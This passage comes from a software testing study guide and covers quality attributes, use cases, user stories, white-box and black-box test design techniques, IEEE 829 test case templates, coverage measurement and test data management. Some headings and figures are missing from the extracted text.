both general and specific authorization for the processing
of transactions. General authorization governs the
authority to conduct different types of business while
specific authorization provides the authority to perform a
specific act.
AUDIT TRAIL The capability to substantiate the processing that has
occurred. The processing of data can be supported
through the retention of sufficient evidential matter to
substantiate the accuracy, completeness, timeliness, and
authorization of data. The process of saving the
supporting evidential matter is frequently called an audit
trail.
CONTINUITY The ability to sustain processing in the event problems
OF occur. Continuity of processing assures that the necessary
PROCESSING procedures and backup information are available to
recoup and recover operations should the integrity of
operations be lost due to problems. Continuity of
processing includes the timeliness of recovery operations
and the ability to maintain processing periods when the
computer is inoperable.
SERVICE Assurance that the desired results will be available within
LEVELS a time frame acceptable to the user. To achieve the desired
service level, it is necessary to match user requirements
with available resources. Resources include input/output
capabilities, communication facilities, processing, and
systems software capabilities.
Attribute Description
ACCESS Assurance that the application system resources will be
CONTROL protected against accidental or intentional modification,
destruction, misuse, and disclosure. The security
procedure is the totality of the steps taken to ensure the
integrity of application data and programs from
unintentional or unauthorized acts.
COMPLIANCE Assurance that the system is designed in accordance with
organizational methodology, policies, procedures, and
standards. These requirements need to be identified,
implemented, and maintained in conjunction with other
application requirements.
RELIABILITY Assurance that the application will perform its intended
function with the required precision over an extended
period of time when placed into production
EASE OF USE The extent of effort required to learn, operate, prepare
input for and interpret output from the system. This test
factor deals with the usability of the system to the people
interfacing with the application system.
MAINTAINABLE The effort required to locate and fix an error in an
operational system.
PORTABLE The effort required to transfer a program from one
hardware configuration and/or software system
environment to another. The effort includes data
conversion, program changes, operating system changes,
and documentation changes.
COUPLING The effort required to interface one application system
with all the application systems in the processing
environment which either it receives data from or
transmits data to.
PERFORMANCE The amount of computing resources and code required by
a system to perform its stated functions. Performance
includes both the manual and automated segments
involved in fulfilling system functions.
EASE OF The amount of effort required to integrate the system into
OPERATION the operating environment and then to operate the
application system. The procedures can be both manual
and automated.
The primary test concern is that the system will perform functionally correct, but the quality
and productivity attributes may not be met. The primary reason these attributes are not met is
they are not included in most software specifications. Structural components are often left to
the discretion of the project people because implementing functionality takes a higher priority
than implementing attributes in most organizations, the attributes are not adequately
addressed.
The responsibility for the attributes resides primarily with the development and test team.
These should be specified in the standards for building/acquiring software systems. A
secondary responsibility resides with the end user/customer to request these attributes.
There are two aspects of testing the attributes. The first is to define the attributes, and the
second is to prioritize the attributes. The first is necessary because defining the attribute
determines the levels of quality that the development team intends to implement in the
application system. For example, if maintainability is one of the quality attributes, then the IT
standards need to state the structural characteristics that will be incorporated into software to
achieve maintainability. The second is important because emphasizing one of the quality
factors may in fact de-emphasize another. For example, it is difficult to have an operation that
is very easy to use and yet highly secure. Ease of use makes access easy, while highly secure
makes access more difficult.
Developing test conditions for the attribute test characteristics involves the following four
steps:
1. Identify attributes
The states are conditions relating to the operating environment and the functional
environment. These are special conditions which may or may not occur, and need to be
addressed by the testers.
Note: This is not to be confused with State Transition testing, a black-box testing technique
described in section 7.4.2.6.
The test concern is that these special states will cause operational problems. If the testers
validate that the software can handle these states there is less concern that the system will
abnormally terminate or function improperly during operation.
The responsibility for validating the states resides with the development and test teams.
7.1.3.13.4 Examples
The primary concern is that the application system will not be operational because the
operating procedures will not work.
The primary responsibility for testing the operating procedures resides with the datacenter or
other IT group responsible for operations. However, testers may work with them in fulfilling
this responsibility.
7.1.3.14.4 Examples
Shown below are the six steps necessary to create a test case using Business Case Analysis:
3. Continue to break the sub-types down until you have reached the lowest level.
Example: A life insurance policy may be active, lapsed, whole life, term, etc.
Section 7.4.2.7 describes Scenario Testing which aligns with Business Care Analysis.
It is possible to perform structural analysis without tools on sections of code that are not
highly complex. To perform structural analysis on entire software modules or complex
sections of code requires automation.
Actors can be divided into two groups: a primary actor is one having a goal which requires the
assistance of the system. A secondary actor is one from which the system requires assistance.
A system boundary diagram depicts the interfaces between the software under test and the
individuals, systems, and other interfaces. These interfaces or external agents are referred to
as “actors.” The purpose of the system boundary diagram is to establish the scope of the
system and to identify the actors (i.e., the interfaces) that need to be developed.
An example of a system boundary diagram for a Kiosk Event Ticketing program is illustrated
in Figure 7-1.
For the application, each system boundary needs to be defined. System boundaries can
include:
• Individuals/groups that manually interface with the software
• Other systems that interface with the software
• Libraries
• Objects within object-oriented systems
Each system boundary should be described. For each boundary an actor must be identified.
Two aspects of actor definition are required. The first is the actor description, and the second,
when possible, is the name of an individual or group who can play the role of the actor (i.e.,
represent that boundary interface). For example, in Figure 7-1 the credit card processing
system is identified as an interface. The actor is the Internet Credit Card Processing Gateway.
Identifying a resource by name can be very helpful to the development team.
The Use Case looks at what the Actor is attempting to accomplish through the system. Use
Cases provide a way to represent the user requirements and must align with the system’s
business requirements. Because of the broader definition of the Actor, it is possible to include
other parts of the processing stream in Use Case development.
Use Cases describe all the tasks that must be performed for the Actor to achieve the desired
objective and include all of the desired functionality. Using an example of an individual
purchasing an event ticket from a kiosk, one Use Case will follow a single flow uninterrupted
by errors or exceptions from beginning to end. This is typically referred to as the Happy Path.
Figure 7-2 uses the Kiosk event to explain the simple flow within the Use Cases.
Figure 7-3 expands the simple case into more detailed functionality. All of the identified
options are listed. The actions in italics represent the flow of a single Use Case (for example
Shop by Date; Select a Valid Option (Date); Ask Customer to Enter Date…).
Where there is more than one valid path through the system, each valid path is often termed a
scenario.
Other results may occur; as none of them are intended results, they represent error conditions.
If there are alternative paths that lead to a successful conclusion of the interaction (the actor
achieves the desired goal) through effective error handling, these may be added to the list of
scenarios as recovery scenarios. Unsuccessful conclusions that result in the actor abandoning
the goal are referred to as failure scenarios.
An Activity Diagram is direct offshoot of the System Boundary Diagram. In the case of
Activity Diagrams, mapping the Use Case onto an Activity Diagram can provide a good
means of visualizing the overlay of system behavior onto business process. An Activity
Diagram representing the Use Case of logging into a system or registering in that system is
shown in Figure 7-4.
Each Use Case is uniquely identified; Karl Wiegers, author of Software Requirements1,
recommends usage of the Verb-Noun syntax for clarity. The Use Case above would be
Purchase Tickets. An alternative flow (and Use Case) that addresses use of the Cancel Option
at any point might be captioned Cancel Transaction.
While listing the various events, the System Boundary Diagrams can be developed to provide
a graphic representation of the possible entities (Figure 7-1) in the Use Case. In addition to the
main flow of a process, Use Cases models, Figure 7-5, can reflect the existence of alternative
flows.
These alternative flows are related to the Use Case by the following three conventions:
<<extend>> extends the normal course, inserts another Use Case that defines an alternative
path. For example, a path might exist which allows the customer to simply see what is
available without making a purchase. This could be referred to as Check Availability.
<<include>> is a Use Case that defines common functionality shared by other Use Cases.
Process Credit Card Payment might be included as a common function if it is used elsewhere.
Exceptions are conditions that result in the task not being successfully completed. In the case
above, Option Not Available could result in no ticket purchase. In some cases these may be
developed as a special type of alternative path.
The initial development of the Use Case may be very simple and lacking in detail. One of the
advantages of the Use Case is that it can evolve and develop over the life of the project.
Because they can grow and change Use Cases for large projects may be classified as follows:
• Essential Use Case - is described in technology free terminology and describes the
business process in the language of the Actor; it includes the goal or object
information. This initial business case will describe a process that has value to the
Actor and describes what the process does.
• System Use Case - is at a lower level of detail and describes what the system does; it
will specify the input data and the expected data results. The system Use Case will
describe how the Actor and the system interact, not just what the objective is.
Case ID - A unique identifier for each Use Case, it includes cross references to the
requirement(s) being tested so that it is possible to trace each requirement through testing.
For example:
Use Case Name - A unique short name for the Use Case that implicitly expresses the user’s
intent or purpose1. The sample event ticket case above might be captioned ChooseEventTime.
Using this nomenclature ties the individual Use Case directly to the Use Cases originally
described and allows it to be sequenced on a name basis alone.
Summary Description - A several sentence description summarizing the Use Cases. This
might appear redundant when an effective Use Case naming standard is in place, but with
large systems, it is possible to become confused about specific points of functionality.
Frequency / Iteration Number - These two pieces of information provide additional context
for the case. The first, frequency, deals with how often the actor executes or triggers the
function covered by the Use Case. This helps to determine how important this functionality is
to the overall system. Iteration number addresses how many times this set of Use Cases has
been executed. There should be a correlation between the two numbers.
Status - This is the status of the case itself: In Development, Ready for Review, and Passed or
Failed Review are typical status designation.
1. Ambler, Scott; Web services programming tips and tricks: Documenting a Use Case;
(scott.ambler@ronin-intl.com); October 2000.
Actors - The list of actors associated with the case; while the primary actor is often clear from
the summary description, the role of secondary actors is easy to miss. This may cause
problems in identifying all of the potential alternative paths.
Trigger - This is the starting point for any action in a process or sub-process. The first trigger
is always the result of interaction with the primary actor. Subsequent triggers initiate other
processes and sub-processes needed by the system to achieve the actor’s goal and to fulfill its
responsibilities.
Basic Course of Events - This is called the main path, the happy path or the primary path. It
is the main flow of logic an actor follows to achieve the desired goal. It describes how the
system works when everything functions properly. If the System Boundary Diagram contains
an <<includes>> or <<extends>>, it can be described here. Alternatively any additional
categories for <<extends>> and <<includes>> must be created. If there are relatively few,
they should be broken out so they will not be overlooked. If they are common, either practice
will work.
Alternative Events - Less frequently used paths of logic, these may be the result of
alternative work processes or an error condition. Alternative events are often signaled by the
existence of an <<exception>> in the System Boundary Diagram.
Pre-Conditions - A list of conditions, if any, which must be met before the Use Case can be
properly executed. In the Kiosk examples cited previously, before a payment can be
calculated, an event, and the number and location of seats must be selected. During Unit and
System testing this situation is handled using Stubs. By acceptance testing, there should be no
Stubs left in the system.
Business Rules and Assumptions - Any business rules not clearly expressed in either the
main or alternate paths must be stated. These may include disqualifying responses to pre-
conditions. Assumptions about the domain that are not made explicit in the main and alternate
paths must be recorded. All assumptions should have been verified prior to the product
arriving for acceptance testing.
Post Conditions - A list of conditions, if any, which will be true after the Use Case finished
successfully. In the Kiosk example the Post Conditions might include:
• The customer receives the correct number of tickets
• Each ticket displays the correct event name and price
• Each ticket shows the requested data, time, and seat location
• The total price for the ticket(s) was properly calculated
• The customer account is properly debited for the transaction
• The ticket inventory is properly updated to reflect tickets issued
• The accounts receivable system receives the correct payment information
Notes - Any relevant information not previously recorded should be entered here. If certain
types of information appear consistently, create a category for them.
Author, Action and Date - This is a sequential list of all of the authors and the date(s) of their
work on the Use Case. Many Use Cases are developed and reworked multiple times over the
course of a large project. This information will help research any problems with the case that
might arise.
Using the Kiosk example above, it becomes clear this process will require access to many
kinds of information from multiple sources. Although no design decisions are ready to be
made about how to access that data, the requirement to do so is obvious. A quick survey of
entertainment purveyors (the source of the tickets) may reveal that while hockey, theatre, and
symphony tickets are readily accessible, football tickets are not. This may lead to a change in
scope to exclude football tickets or in an upward revision of the time and cost estimates for
achieving that functionality.
Likewise, the Use Case provides an excellent entrée into the testing effort, to such an extent
that for many organizations, the benefits of Use Cases for requirements are ignored in the
effort to jump start testing! Further to the relationship of Use Cases to testing, the iteration
process may require a little explanation. As the Use Case evolves from a purely business event
focus to include more system information, it may be desirable to maintain several versions or
levels of the Use Case. For example the initial Use Case, developed during the first JAD
session(s), might be Iteration 1; as it is expanded to include systems information, it becomes
Iteration 2 and when fully configured to include the remaining testing related information it is
Iteration 3. Use of common Iteration levels across projects will reduce confusion and aid
applicability of the Use Case.
Additional testable conditions are derived from the exceptions and alternative course of the
Use Case (alternate path(s)). Note that additional detail may need to be added to support the
actual testing of all the possible scenarios of the Use Case.
During the development of Use Cases, the components of pre-conditions, the process flow, the
business rules, and the post-conditions are documented. Each of these components will be a
focus for evaluation during the test.
The most important part of developing test cases from Use Cases is to understand the flow of
events. The flows of events are the happy path, the sad path, and the alternate event paths. The
happy path is what normally happens when the Use Case is performed. The sad path
represents a correct path but one which does not produce results, which is what the application
should do on that path. The alternate paths represent detours off the happy path but which can
still yield the results of the happy path. Understanding the flow is a critical first step. The
various diagrams (e.g., Use Case activity map) generated during Use Case development are
invaluable in this process.
The next step in the process is to take each event flow as identified in the previous step and
create Use Case scenarios. A Use Case scenario is a complete path through the Use Case for a
particular flow. The happy path would be one of the Use Case scenarios.
Once all the Use Case scenarios are written, at least one test case, and in most cases more than
one test case, will be developed for each scenario. The test case should ensure that:
1. The test will not initiate if any of the pre-conditions are wrong.
3. The Use Case for the particular test procedures the conditions and/or output as
specified in the post-conditions.
The detailed development of test cases from Use Cases will utilize test design techniques
described in section 7.4.
but it is the journey taken to arrive at those results that differs. Table 7-5 compares the
characteristics of a User Story and Use Case.
As defined in section 7.2.1, a Use Case describes the interaction between an Actor (which can
be person or another system) and the System. The development of Use Cases is a well-defined
process resulting in specific documents. While Use Cases can be iterative in nature the
primary goal is to document the system early in the life cycle.
Unlike a Use Case, a User Story is a short description of something that a customer will do
when they use an application (software system). The User Story is focused on the value or
result a customer would receive from doing whatever it is the application does. User Stories
are written from the point of view of a person using the application. Mike Cohn, a respected
Agile expert and contributor to the invention of the Scrum software development
methodology suggests the User Story format as: “As an [actor] I want [action] so that
[achievement].” The User Story starts with that simple description and the details of the User
Story emerge organically as part of the iterative process.
Independent A User Story is independent of other User Stories and stories do not overlap.
1. Megan S. Sumrell, Quality Architect, Mosaic ATM, Inc. (Quest 2013 Conference Presentation).
2. William Wake, Senior Consultant, Industrial Logic, Inc.
Estimable User Stories must be created such that their size can be estimated.
Small User Stories should not be so big as to become impossible to plan/task/prioritize with
a certain level of certainty. A rule of thumb, a User Story should require no more than four
days and no less than a half day to implement.
Testable A User Story must provide the necessary information to make test development
possible.
Recognizing that User Stories are a high-level description and focused on the value or result
the user will receive, it is uncommon to test the User Story directly.
In the Agile development model, unit testing is at the heart of the testing process. Developers
will typically break down the User Story into distinct program modules and the unit testing
process tests those modules at the code level. By contrast, the tester looks at the system more
holistically with a goal to test the system like the user will use the system. Questions like,
what would the user do, how might the user misuse the system intentionally or
unintentionally, what might derail the process from attaining the objective of the User Story?
In essence, testing takes on a much more exploratory testing flavor (see section 1.9.2.4).
As a precursor to discussing the Agile testing process it is important to remember that testing
on an Agile project is not a phase but rather a continuous process throughout the life cycle.
The success of an Agile developed product mandates this commitment to continuous testing.
During the process of writing the User Story the product owner also writes acceptance criteria,
which defines the boundaries of a User Story, and will be used during development to validate
that a story is completed and working as intended. The acceptance criteria will include the
functional and non-functional criteria. These criteria would identify specific user tasks,
functions or business processes that must be in place at the end of the sprint or project. A
functional requirement might be “On acceptance of bank debit card the PIN input field will be
displayed.” A non-functional requirement might be “Option LEDs will blink when option is
available.” Performance will typically be a criterion and likely measured as a response time.
Expected performance should be spelled out as a range such as “1-3 seconds for PIN
acceptance or rejection.”
Each User Story will have one or more acceptance tests. Similar to the Use Case test process
as described in section 7.2.5.1, the acceptance tests should be scenario based that can then be
broken down into one or more test cases. Acceptance tests are by default part of the happy
path. Tests that validate the correct function of features required by the acceptance test are
also considered happy path tests. Tests for sad and alternate paths are best executed after the
happy path tests have passed.
The detailed development of test cases used to validate the acceptance criteria will utilize test
design techniques described in section 7.4.
section 7.1.3). Regardless of the development methodology, the need to understand first the
objectives of the tests and then the conditions to be tested is irrefutable.
With the objectives and conditions understood, the next step would be to understand the types
of test design techniques that can be employed in the development of test cases. Test design
techniques can be grouped into four major categories:
• Structural Testing
• Functional Testing
• Experience-Based Techniques
• Non-Functional Testing
For the purpose of describing structural test case design techniques in this skill category, the
focus will be on white-box testing techniques.
White-box testing (also referred to as clear-box testing, glass-box testing, and structure-based
testing) includes the following types of test techniques:
• Statement Testing
• Branch Testing
• Decision Testing
• Branch Condition Testing
• Branch Condition Combination Testing
• Modified Condition Decision Coverage Testing
• Date Flow Testing
Collectively, statement, branch, decision, branch condition, branch condition combination and
modified condition decision testing are known as Control Flow Testing. Control Flow Testing
tends to focus on ensuring that each statement within a program is executed at least once. Data
Flow Testing by contrast focuses on how statements interact through the data flow.
Shown here is an example of code that sets a variable (WithdrawalMax), reads two numbers
into variables (AcctBal and WithdrawalAmt). If there are sufficient funds in the account to
cover the withdrawal amount the program prints out a message indicating that and if not
sufficient funds a message is printed and the program terminates. If sufficient funds exist then
the program checks to see if the withdrawal amount exceeds the withdrawal maximum. If so,
it prints a message that withdrawal exceeds limit and terminates, else program terminates.
This code is in the flow chart shown as Figure 7-6. Every box in the flowchart represents an
individual statement.
WithdrawalMax = 100
INPUT AcctBal
INPUT WithdrawalAmt
IF AcctBal >= WithdrawalAmt THEN
PRINT "Sufficient Funds for Withdrawal"
IF WithdrawalAmt > WithdrawalMax THEN
PRINT "Withdrawal Amount Exceeds Withdrawal
Limit"
END IF
ELSE
PRINT "Withdrawal Amount Exceeds Account
Balance"
END IF
For statement testing, a series of test cases will be written to execute each input, decision, and
output in the flowchart.
1. Set the WithdrawalMax variable, read data, evaluate availability of funds as not
sufficient, and print message.
2. Set the WithdrawlMax variable, read data, evaluate availability of funds as sufficient,
print message, evaluate the limit is exceeded, and print message.
By executing both tests, all statements have been executed achieving 100% statement
coverage. However, in the following section the drawback of just statement testing is
described.
Referring to the source code and flow chart from section 7.4.1.1, it is necessary to find the
minimum number of paths which will ensure that all true/false decisions are covered. The
paths can be identified as follows using the numbers in Figure 7-6.
1. 1A-2B-3C-4D-5E
2. 1A-2B-3C-4F-6G-7J
3. 1A-2B-3C-4F-6G-7H-8I
For this example, the number of tests required to ensure decision or branch coverage is 3.
For this example the source code in 7.4.1.1 has been modified to remove the nested “if” by
creating a compound condition. In this code a CreditLine variable has been added that when a
credit line is available (by answering Y) then funds withdrawal is always approved. The
resultant code is shown below:.
WithdrawalMax = 100
INPUT AcctBal
INPUT WithdrawalAmt
INPUT CreditLine
IF CreditLine=”Y” or (AcctBal >= WithdrawalAmt
AND WithdrawalAmt <= WithdrawalMax) THEN
PRINT "Withdrawal of Funds Approved"
ELSE
PRINT "Withdrawal of Funds Denied"
END IF
Branch Condition Coverage would require Boolean operand Exp1 to be evaluated both TRUE
and FALSE, Boolean operand Exp2 to be evaluated both TRUE and FALSE, and Boolean
operand Exp3 to be evaluated both TRUE and FALSE.
Branch Condition Coverage may therefore be achieved with the following set of test inputs
(note that there are alternative sets of test inputs which will also achieve Branch Condition
Coverage).
Case Exp1 Exp2 Exp3
1 FALSE FALSE FALSE
2 TRUE TRUE TRUE
While this would exercise each of the Boolean operands, it would not test all possible
combinations of TRUE / FALSE. Branch Condition Combination Coverage would require all
combinations of Boolean operands Exp1, Exp2 and Exp3 to be evaluated. Table 7-7 shows the
Branch Condition Combination Testing table for this example.
Branch Condition Combination Coverage is very thorough, requiring 2n test cases to achieve
100% coverage of a condition containing n Boolean operands. This rapidly becomes
unachievable for more complex conditions.
Modified Condition Decision Coverage is a compromise which requires fewer test cases than
Branch Condition Combination Coverage. Modified Condition Decision Coverage requires
test cases to show that each Boolean operand (Exp1, Exp2, and Exp3) can independently
affect the outcome of the decision. This is less than all the combinations (as required by
Branch Condition Combination Coverage). This reduction in the number of cases is often
referred to as collapsing a decision table and will be describe in further detail in the decision
table section of black-box testing.
characteristics of the loops. Boundary and interior testing require executing loops zero times,
one time, and if possible, the maximum number of times. Linear sequence code and jump
criteria specify a hierarchy of successively more complex path coverage.
Data flow analysis, when used in test case generation, exploits the relationship between points
where variables are defined and points where they are used.
• use at 7
For the purpose of describing functional test case design techniques in this section of Skill
Category 7, the focus will be on black-box testing techniques.
and output results. The benefit of this technique is that you do not need to generate redundant
test cases by testing each possible value with identical outcomes.
Equivalence classes (EC) are most suited to systems in which much of the input data takes on
values within ranges or within sets, thereby significantly reducing the number of test cases
that must be created and executed. One of the limitations of this technique is that it makes the
assumption that the data in the same equivalence class is processed in the same way by the
system.
Note: Error masking can occur when more than one invalid value is contained in a single test
case. The processing of the test case may be terminated when an earlier invalid value is
executed thus never processing or evaluating subsequent invalid data. The result is not
knowing how that invalid value processes.
Referring back to the earlier example: Withdrawal limit set to $100, read two variables,
account balance and withdrawal amount, If there are sufficient funds in the account to cover
the withdrawal amount the program prints out a message indicating that and if there is not
sufficient funds a message is printed indicating that. If sufficient funds exist then the program
checks to see if the withdrawal amount exceeds the withdrawal limit. If so, it prints a message
that withdrawal exceeds limit.
An advantage of the equivalence partitioning technique is that it eliminates the need for
exhaustive testing. It enables testers to cover a large domain of inputs or outputs with a
smaller subset of input data selected from an equivalence partition. This technique also
enables the testers to select a subset of test inputs with a high probability of detecting a defect.
One of the limitations of this technique is that it assumes that data in the same equivalence
partition is processed in the same way by the system. Note that equivalence partitioning is not
a stand-alone method to determine test cases. It has to be supplemented by the ‘Boundary
Value Analysis’ technique, which is discussed in the next section.
An advantage of the Boundary Value Analysis technique is that the technique helps discover
contradictions in the actual system and the specifications, and enables test cases to be
designed as soon as the functional specifications are complete. As discussed numerous times,
the earlier testing can begin the better. BVA allows early static testing of the functional
specifications.
This technique works well when the program to be tested is a function of several independent
variables that represent bounded physical quantities.
Decision tables are used to describe and analyze problems that contain procedural decision
situations characterized by one or more conditions; the state of these conditions determines
the execution of a set of actions. Decision tables represent complex business rules based on a
set of conditions.
Condition Entry
Rule 1 Rule 2 ----- Rule p
Condition Stub
Conditions
Condition 1
Condition 2
-----
Condition
m
Action Entry
Action Stub
Action 1
Action 2
-----
Action n
• The upper left portion of the format is called the condition stub quadrant; it contains
statements of the conditions. Similarly, the lower left portion is called the action stub
quadrant; it contains statement of the actions. The condition entry and action quadrants
that appear in the upper and lower right portions form a decision rule.
• The various input conditions are represented by the conditions 1 through m and the
actions are represented by actions 1 through n. These actions should be taken
depending on the various combinations of input conditions.
• Each of the rules defines a unique combination of conditions that result in the
execution (firing) of the actions associated with the rule.
• All the possible combinations of conditions define a set of alternatives. For each
alternative, a test action should be considered. The number of alternatives increases
exponentially with the number of conditions, which may be express as
2NumberofConditions. When the decision table becomes too complex, a hierarchy of new
decision tables can be constructed.
The advantage of decision table testing is that it allows testers to start with a “complete” view,
with no consideration of dependence, then looking at and considering the “dependent,”
“impossible,” and “not relevant” situations and eliminating some test cases.
The disadvantage of decision table testing is the need to decide (or know) what conditions are
relevant for testing. Also, scaling up is challenging because the number of test cases increases
exponentially with the number of conditions (scaling up can be massive: 2n for n conditions).
Decision table testing is useful for those applications that include several dependent
relationships among the input parameters. For simple data-oriented applications that typically
perform operations such as adding, deleting, and modifying entries, this technique is not
appropriate.
The Pair-Wise testing technique can significantly reduce the number of test cases. It protects
against pair-wise defects which represent the majority of combinatorial defects. There are
tools available which can create the All pairs table automatically. Efficiency is improved
because the much smaller pair-wise test suite achieves the same level of coverage as larger
combinatorial test suites.
cannot take place before Event A). When an event occurs, the system can change state
or remain in the same state and/or execute an action. Events may have parameters
associated with them.
• Action (represented by a command following a “/”) An action is an operation
initiated because of a state change. Often these actions cause something to be created
that is an output of the system.
The disadvantage of State Transition testing is that it becomes very large and cumbersome
when the number of states and events increases.
Some people have a natural intuition for test case generation. While this ability cannot be
completely described nor formalized, certain test cases seem highly probable to catch errors.
For example, input values of zero and input values that cause zero outputs are cases where a
tester may guess an error could occur. Guessing carries no guarantee for success, but neither
does it carry any penalty.
intention of stress testing is to identify constraints and to ensure that there are no
performance problems.
• Usability testing: Testing that evaluates the effort required to learn, operate, prepare
input, and interpret output of an application system. This includes the application’s
user interface and other human factors of the application. This is to ensure that the
design (layout and sequence, etc.) enables the business functions to be executed as
easily and intuitively as possible. (See section 1.2.5.1)
• Volume testing: Testing that validates the application’s internal limitations. For
example, internal accumulation of information, such as table sizes, or number of line
items in an event, such as the number of items that can be included on an invoice, or
size of accumulation fields, or data-related limitations, such as leap year, decade
change, or switching calendar years.
Test cases take what we learned needs to be tested, and combines it with the skillful use of the
test techniques to precisely define what will be executed and what is being covered.
Experience shows that it is uneconomical to test all conditions in an application system.
Experience further shows that most testing exercises less than one-half of the computer
instructions. Therefore, optimizing testing through selecting the most important processing
events is the key aspect of building test cases.
If resources are limited, the best use of those resources will be obtained by testing the
most important test conditions. The objective of ranking is to identify high-priority test
conditions that should be tested first. Considerations may include the stability of the
system, level of automation, skill of the testers, test methodology, and, most
importantly, risk.
Ranking does not mean that low-ranked test conditions will not be tested. Ranking can
be used for two purposes: first, to determine which conditions should be tested first;
and second, and equally as important, to determine the amount of resources allocated
to each of the test conditions.
The IEEE 829 template for test case specification is shown below:
2. Test Items
3. Input Specifications
4. Output Specifications
5. Environment Needs
7. Inter-Case Dependencies
Test Case Specification Identifier – A unique identifier that ideally follows the same rules
as the software to which it is related. This is helpful when coordinating software and testware
versions within configuration management.
Test Items - Identify the items or features to be tested by this test case. This could include
requirements specifications, design specifications, detail design specifications, and code.
Input Specifications - Identify all inputs required to execute the test case. Items to include
would be: data items, tables, human actions, states (initial, intermediate, final), files,
databases, and relationships.
Output Specifications - Identify all outputs required to verify the test case. This would
describe what the system should look like after the test case is run.
Special Procedural Requirements - Identify any special constraints for each test case.
Inter-Case Dependencies - Identify any prerequisite test cases. One test case may require
another case to run before it to setup the environment for the next case to run. It is
recommended that the relationship of test cases be documented at both ends of the
relationship. The precursor should identify any follow-on test cases and the post cases identify
all prerequisites.
The IEEE 829 standard provides a good template for organizations to customize to their
unique needs. Listed below is another example of a test case format.
• Test Suite ID - The ID of the test suite to which this test case belongs.
• Test Case ID - The ID of the test case.
• Test Case Summary - The summary/objective of the test case.
• Related Requirement - The ID of the requirement to which this test case relates/traces
• Preconditions - Any preconditions that must exist prior to executing the test.
• Test Procedure - Step-by-step procedure to execute the test.
• Expected Result - The expected result of the test.
• Actual Result - The actual result of the test.
The objective of test coverage is simply to assure that the test process has covered the
application. Although this sounds simple, effectively measuring coverage may be critical to
the success of the implementation. There are many methods that can be used to define and
measure test coverage, including:
• Statement Coverage
• Branch Coverage
• Basis Path Coverage
• Integration Sub-tree Coverage
• Modified Decision Coverage
• Global Data Coverage
• User-specified Data Coverage
It is usually necessary to employ some form of automation to measure the portions of the
application covered by a set of tests. There are many commercially available tools that support
test coverage analysis in order to both accelerate testing and widen the coverage achieved by
the tests. The development team can also design and implement code instrumentation to
support this analysis. This automation enables the team to:
• Measure the “coverage” of a set of test cases
• Analyze test case coverage against system requirements
• Develop new test cases to test previously “uncovered” parts of a system
Even with the use of tools to measure coverage, it is usually cost prohibitive to design tests to
cover 100% of the application outside of unit testing or black-box testing methods. One way
to leverage a dynamic analyzer during system testing is to begin by generating test cases
based on functional or black-box test techniques. Examine the coverage reports as test cases
are executed. When the functional testing provides a diminishing rate of additional coverage
for the effort expended, use the coverage results to conduct additional white-box or structural
testing on the remaining parts of the application until the coverage goal is achieved.
Skill
Category
8
Executing the Test Process
A
common mantra throughout the Software Testing Body of Knowledge (STBOK) has
been test early, test often, and test throughout the development life cycle. Skill
Category 6 covered the static testing processes of walkthroughs, checkpoint review,
and inspections. Typically those test processes are used in the earlier phases of the
life cycle. Skill Category 7 identified test techniques most of which can only be used when
actual programming code exists. Whether the life cycle is organized as a series of Agile
Scrum Sprints or a long term waterfall project; ideas coalesce, designs are made, code is
written, and checks are done. To that end the goal of this Skill Category is to describe the
processes of test execution across the life cycle utilizing the knowledge and skills defined in
the previous skill categories of this the Software Testing Body of Knowledge.
has an opportunity to run the finished program in an environment that parallels the operational
environment for the primary purpose of providing the customer with enough confidence in the
application system to accept delivery. The V-diagram (Figure 1-20) in section 1.8 as well as
table 1-12 in section 1.8.2.2 illustrates where UAT falls within the SDLC. By contrast, the
objective of acceptance testing is to determine throughout the development cycle that all
aspects of the development process meet the user’s needs. There are many ways to accomplish
this. The user may require that the implementation plan be subject to an independent review of
which the user may choose to be a part, or he or she may simply prefer to input acceptance
criteria into the review process.
Test procedure specification identifier - Specify the unique identifier assigned to this test
procedure specification. Supplies a reference to the associated test design specification.
Purpose - Describe the purpose(s) of this procedure. If this procedure executes any test cases,
provide a reference for each of them. In addition, provide references to relevant sections of the
test item documentation (e.g., references to usage procedures).
Special requirements - Identify any special requirements that are necessary for the execution
of this procedure. These may include prerequisite procedures, special skills requirements, and
special environmental requirements.
Procedure steps:
Log - Describe any special methods or formats for logging the results of test execution,
the incidents observed, and any other events pertinent to the test.
Set up - Describe the sequence of actions necessary to prepare for execution of the
procedure.
Start - Describe the actions necessary to begin execution of the procedure.
Proceed - Describe any actions necessary during execution of the procedure.
Measure - Describe how the test measurements will be made (e.g., describe how remote
terminal response time is to be measured during a network simulator).
Shut down - Describe the actions necessary to suspend testingwhen unscheduled events
dictate this.
Restart - Identify any procedural restart points and describe the actions necessary to
restart the procedure at each of these points.
Stop - Describe the actions necessary to bring execution to an orderly halt.
Wrap up - Describe the actions necessary to restore the environment.
Contingencies - Describe the actions necessary to deal with anomalous events that may
occur during execution.
• Testing COTS
• When is Testing Complete?
Since the test scripts and test cases may need to run on different platforms, the platforms must
be taken into consideration when designing test cases and test scripts. Since a large number of
platforms may be involved in the operation of the software, testers need to decide which
platforms to include in the test environment.
Software testers should determine the number and purpose of the test cycles to be used during
testing. Some of these cycles will focus on the level of testing, for example unit, integration
and system testing. Other cycles may address attributes of the software such as data entry,
database updating and maintenance, and error processing.
There are potentially three distinct sets of test data required to test most applications; one set
of test data to confirm the expected results (data along the happy path), a second set to verify
the software behaves correctly for invalid input data (alternate paths or sad path), and finally
data intended to force incorrect processing (e.g., crash the application). Volume testing
requires the creation of test data as well.
Test data may be produced in a focused or systematic way or by using other, less-focused
approaches such as high-volume randomized automated tests. Test data may be produced by
the tester, or by a program or function that aids the tester. Test data may be recorded for re-use,
or used once and then forgotten.
The use of production data appears to be the easiest and quickest means for generating test
data. This is true if production data is used as is. Unfortunately, production data rarely
provides good test data. To convert production data into good test data may be as time-
consuming as the construction of test data itself.
Manually created data is a common technique for creating test data. Creating data this way
allows for specific data points to be included in the dataset that will test an application
function whose contents have been predefined to meet the designed test conditions. For
example, master file records, table records, and input data transactions could be generated
after conditions are designed but prior to test execution, which will exercise each test
condition/case. Once data is created to match the test conditions, specific expected results are
determined and documented so that actual results can be checked during or after test
execution.
There are a variety of models describing the TDM lifecycle. A simple but sufficient model
includes:
• Analysis
• Design
• Creation
• Use
• Maintenance
• Destruction
Analysis – This step identifies the types of data needed based on the defined test conditions.
Also, the frequency the data will be refreshed and where the test data will be stored.
Design – The design step includes implementing the data storage infrastructure, securing any
tools that might be used, and completing any prep work that might be necessary before the
data creation step.
Creation – This step would follow the sequence of events as described in sections 8.3.3.1 and
8.3.3.2 above.
Use – The shaded section of Figure 8-1 represents the use of test data.
